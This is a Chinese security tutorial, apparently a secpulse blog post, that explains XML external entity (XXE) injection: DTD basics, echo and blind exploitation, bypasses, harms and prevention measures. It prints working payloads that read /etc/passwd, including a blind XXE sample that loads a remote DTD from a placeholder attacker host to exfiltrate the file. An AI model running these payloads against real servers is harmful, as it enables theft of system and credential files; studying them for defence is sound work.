web类 | XXE漏洞总结

XML外部实体注入简称XXE漏洞:XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

1. XML基础知识

XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。

<?xml version=”1.0”>           //xml声明
<!DOCTYPE  note [<!ELEMENT note (to, from, heading, body)><!ELEMENT to   (#PCDATA)>                     //文档类型定义<!ELEMENT from (#PCDATA)><!ELEMENT heading (#PCDATA)><!ELEMENT body   (#PCDATA)>]>
<note><to>George</to><from>John</from>                                 //文档元素<heading>Reminder</heading><body>Don’t forget the meeting</body>

2. XXE漏洞原理

XXE Injection (XML External Entity Injection,XML 外部实体注入攻击)攻击者可以通过 XML 的外部实体来获取服务器中本应被保护的数据。对于XXE漏洞最为关键的部分是DTD文档类型,DTD 的作用是定义 XML 文档的合法构建模块。当允许引用外部实体时,通过恶意构造,可以导致任意文件读取、执行系统命令、探测内网端口、攻击内网网站等危害。DTD 可以在 XML 文档内声明,也可以外部引用;libxml2.9.1及以后,默认不再解析外部实体。

image.png

在解析 XML 时,实体将会被替换成相应的引用内容,xml文档如下所示:

(1) 包含内部实体的 XML 文档

image.png

(2) 包含外部实体的 XML 文档

image.png

3. XXE漏洞利用

(1) XML 解析器解析外部实体时支持多种协议

image.png

(2) 不同解析器可能默认对于外部实体会有不同的处理规则,有些可能不会对外部实体进行解析:

PHP:DOM、SimpleXML;
.NET:System.Xml.XmlDocument、System.Xml.XmlReader。

对于XXE通常有两种利用方式:

1) 有回显XXE、

攻击者通过正常的回显或报错将外部实体中的内容读取出来。file 协议读取文件:

image.png

2) Blind XXE、

服务器没有回显,只能使用 Blind XXE 来构建一条带外数据通道提取数据; Blind XXE 主要使用了 DTD 约束中的参数实体和内部定义实体。参数实体:一个只能在 DTD 中定义和使用的实体,一般引用时用 % 作为前缀; 内部定义实体:在一个实体中定义的一个实体,即嵌套定义:

image.png

Blind XXE 采用嵌套形式建立带外数据通道,利用参数实体将本地内容读出来后,作为外部实体中的 URL 中的参数向其指定服务器发起请求,然后在其指定服务器的日志(Apache 日志)中读出文件的内容(指定服务器即攻击者的服务器);DTD 中使用 % 来定义的参数实体只能在外部子集中使用,或由外部文件定义参数实体,引用到 XML 文件的 DTD 来使用; 有些解释器不允许在内层实体中使用外部连接,无论内层是一般实体还是参数实体,所以需要将嵌套的实体声明放在外部文件中。

4. XXE漏洞绕过

有回显的XXE漏洞利用:

方式一、 xml内容为:

image.png

方式二、

image.png

远程vps服务器 www/html文件下建立evil.dtd文件,文件内容如下:

<!ENTITY b SYSTEM "file:///etc/passwd">



无回显的XXE漏洞利用:

xml内容为:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY  % file  SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" >
<!ENTITY  % remote  SYSTEM "http://ip/evil2.dtd" >
%remote;
%all;
%send;
]>

远程端vps上在www/html文件夹下放置两个文件一个为test.php文件用于接收信息,另一个为test.dtd  其中test.php代码如下:

image.png

test.dtd中代码如下:

image.png


0x04 XML造成的危害

(1) 读取任意文件 xml内容为:

image.png


(2) 执行系统命令 在安装expect扩展的PHP环境里执行系统命令,其他协议也有可能执行系统命令;

image.png

(3) 探测内网端口

image.png

(4) 攻击内网网站

image.png

0x05 XML注入预防

1、预定义字符转义:

<       &lt; >       &gt; &       &amp; ‘      &apos; “      &quot;

2、过滤用户提交的XML数据,关键词:,SYSTEM和PUBLIC; 

3、禁用外部实体:libxml_disable_entity_loader(true);

本文作者:贝塔安全实验室

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/189161.html

Tags:
评论  (0)
快来写下你的想法吧!

贝塔安全实验室

文章数:29 积分: 65

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号